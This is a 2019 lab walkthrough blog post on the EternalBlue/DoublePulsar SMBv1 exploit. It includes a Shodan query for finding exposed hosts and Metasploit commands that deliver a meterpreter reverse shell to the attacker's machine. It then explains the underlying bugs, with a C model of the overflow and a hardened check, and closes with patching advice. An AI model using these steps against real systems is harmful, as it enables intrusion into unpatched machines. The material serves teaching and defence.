Eternal Blue DoublePulsar Exploit

Michael Koczwara
Dark Roast Security
5 min read, Jul 26, 2019


Eternal Blue

Quick intro: Eternal Blue 101

What is Eternal Blue?

EternalBlue, sometimes stylized as ETERNALBLUE, is a cyber-attack exploit developed by the U.S. National Security Agency (NSA) according to testimony by former NSA employees. It was leaked by the Shadow Brokers hacker group on April 14, 2017, and was used as part of the worldwide WannaCry ransomware attack on May 12, 2017. The exploit was also used to help carry out the 2017 NotPetya cyberattack on June 27, 2017, and reported to be used as part of the Retefe banking trojan since at least September 5, 2017.

Shodan Search

There are still tons of vulnerable systems on the internet.

Shodan search to identify potentially unpatched and affected systems:

port:445 "SMB Version: 1" os:Windows !product:Samba

image by author — shodan search

When run, we see that there are about 974,800 systems on the internet that could be vulnerable. This query does not test for the vulnerability itself, so we don't know whether these systems are patched or not.

Lab Set Up

In this lab, I will use the Eternal Blue exploit from GitHub and add it to the Metasploit database (so that it can deliver a meterpreter shell).

  • Kali Linux
  • Windows 7 (64-bit)
  • EternalBlue/DoublePulsar exploit from GitHub

Setting up Kali

  1. Download the Eternal Blue exploit from GitHub to the root directory
  2. cd /root
  3. git clone https://github.com/ElevenPaths/Eternalblue-Doublepulsar-Metasploit.git
  4. Add the exploit to the Metasploit database

image by author — adding exploit to the metasploit database

  5. Install and set up Wine in the root directory

image by author — wine emulator should be in the root directory

  6. Run an Nmap scan to check whether port 445 is open on the target machine

image by author — nmap scan

Set Up the Payload

  1. msfconsole
  2. use exploit/windows/smb/eternalblue_doublepulsar
  3. info
  4. set rhosts <target machine IP address>
  5. set processinject lsass.exe (for 64-bit targets)
  6. set targetarchitecture x64
  7. winepath: the Wine directory should be in the root directory
  8. Leave the other options at their defaults

image by author — payload setup

  9. set payload windows/x64/meterpreter/reverse_tcp

image by author — payload setup

  10. set lhost <Kali IP address>

  11. Leave the other options at their defaults, then run the exploit command

image by author — exploit resulting in remote code injection and a meterpreter shell

How Does Eternal Blue Work?

Eternal Blue relies on a Windows kernel function named srv!SrvOs2FeaListSizeToNt. To see how this leads to remote code execution, let's take a quick look at how SMB works.

Server Message Block (SMB) operates as an application-layer network protocol mainly used for providing shared access to files, printers, serial ports and miscellaneous communications between nodes on a network.

Eternal Blue exploits three bugs:

The first bug is a mathematical error that occurs when the server casts an OS/2 File Extended Attribute (FEA) list structure to an NT FEA structure in order to determine how much memory to allocate. The miscalculation is an integer overflow that causes less memory to be allocated than expected, which in turn leads to a buffer overflow: with more data being written than the buffer holds, the extra data overflows into adjacent memory.
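To make the first bug concrete, here is a simplified model written for this article (not the page's own code and not srv.sys's real layout; the field names, the header sizes and the 16-bit accumulator are assumptions): a size computation that silently wraps in a narrow type, next to a hardened version that checks its budget and refuses oversized lists.

```c
#include <stdint.h>
#include <stddef.h>
#include <stdbool.h>
/* OS/2 FEA entry as modelled here (an assumption, not srv.sys's real layout):
 * flag byte, name length, value length; name+NUL and value follow. */
typedef struct { uint8_t flags, name_len; uint16_t value_len; } os2_fea_t;
#define NT_FEA_HEADER 8u   /* modelled NT header; NT entries are 4-byte aligned */
#define ALIGN4(x) (((x) + 3u) & ~3u)

static uint32_t nt_size_of(const os2_fea_t *e) {
    return ALIGN4(NT_FEA_HEADER + e->name_len + 1u + e->value_len);
}

/* Vulnerable pattern: the NT size is kept in a 16-bit field, so a list whose
 * true NT size exceeds 65535 wraps and far less memory is allocated than the
 * conversion will later write into it. */
uint16_t fea_list_size_to_nt_narrow(const os2_fea_t *list, size_t n) {
    uint16_t total = 0;                        /* narrow accumulator: the bug */
    for (size_t i = 0; i < n; i++)
        total += (uint16_t)nt_size_of(&list[i]);
    return total;
}

/* Hardened version: full-width arithmetic plus an explicit check against the
 * caller's buffer budget; oversized lists are rejected, never truncated. */
bool fea_list_size_to_nt_checked(const os2_fea_t *list, size_t n,
                                 uint32_t max_out, uint32_t *out) {
    uint32_t total = 0;
    for (size_t i = 0; i < n; i++) {
        uint32_t s = nt_size_of(&list[i]);
        if (s > max_out - total) return false;   /* would exceed the budget */
        total += s;
    }
    *out = total; return true;
}

/* Constructed sample: 100 maximal entries (255-byte name, 65535-byte value);
 * each converts to 65800 NT bytes, the whole list to 6,580,000. */
#define DEMO_ENTRIES 100
static void demo_fill(os2_fea_t *list) {
    for (size_t i = 0; i < DEMO_ENTRIES; i++) list[i] = (os2_fea_t){0, 255, 65535};
}
uint32_t demo_narrow_size(void) {              /* 26400: wrong and far too small */
    os2_fea_t list[DEMO_ENTRIES]; demo_fill(list);
    return fea_list_size_to_nt_narrow(list, DEMO_ENTRIES);
}
uint32_t demo_checked_size(uint32_t max_out) { /* 0 when the list is rejected */
    os2_fea_t list[DEMO_ENTRIES]; demo_fill(list);
    uint32_t out = 0;
    return fea_list_size_to_nt_checked(list, DEMO_ENTRIES, max_out, &out) ? out : 0;
}
```

The narrow version reports 26,400 bytes for a list that really converts to 6,580,000, which is exactly the undersized allocation the first bug produces; the checked version either returns the true size or rejects the list outright.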

Triggering the buffer overflow is achieved thanks to the second bug, which results from a difference in the SMB protocol's definition of two related subcommands: SMB_COM_TRANSACTION2 and SMB_COM_NT_TRANSACT.

Both have a _SECONDARY command that is used when there is too much data to include in a single packet. The crucial difference between TRANSACTION2 and NT_TRANSACT is that the latter calls for a data packet twice the size of the former. This is significant because an error in validation occurs if the client sends a crafted message using the NT_TRANSACT sub-command immediately before the TRANSACTION2 one.

While the protocol recognizes that two separate sub-commands have been received, it assigns the type and size of both packets (and allocates memory accordingly) based only on the type of the last one received. Since the last one is smaller, the first packet will occupy more space than it is allocated.

Once the attackers achieve this initial overflow, they can take advantage of a third bug in SMBv1 which allows heap spraying, a technique which results in allocating a chunk of memory at a given address. From here, the attacker can write and execute shellcode to take control of the system.

Summary

The Eternal Blue exploit should work on every unpatched Windows 7 and earlier system, including Windows XP (all service packs, x86 and x64), Windows Server 2003 SP0 (x86), Windows Server 2003 SP1/SP2 (x86), Windows Server 2003 (x64), Windows Vista (x86), Windows Vista (x64), Windows Server 2008 (x86), and Windows Server 2008 R2 (x86 and x64).

How to Stay Secure from Eternal Blue

If possible, apply Microsoft patch MS17-010. If you are unable to do so, disabling SMBv1 also mitigates the risk.